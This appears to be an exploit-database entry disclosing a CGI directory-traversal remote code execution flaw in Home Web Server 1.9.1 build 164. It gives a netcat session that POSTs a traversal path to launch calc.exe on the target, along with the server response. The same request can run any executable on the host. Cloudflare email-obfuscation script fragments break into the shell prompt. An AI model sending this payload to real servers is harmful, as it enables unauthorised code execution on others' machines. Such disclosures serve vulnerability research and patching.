Home Web Server 1.9.1 build 164 - Remote Code Execution
2017-05-26 12:05:03# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps
"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him
Description :
-------------
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
it is possible to run any executable being on the remote host.
Instructions:
-------------
- Starts Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""
# Connect with netcat, then drop a single POST to call the executable you want
<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="204755494c4c41554d45604b414c49">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)
"""
[CTRL+C] : this is important to launch the executable we requested
Calc.exe has been launched on the remote host.
"""
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.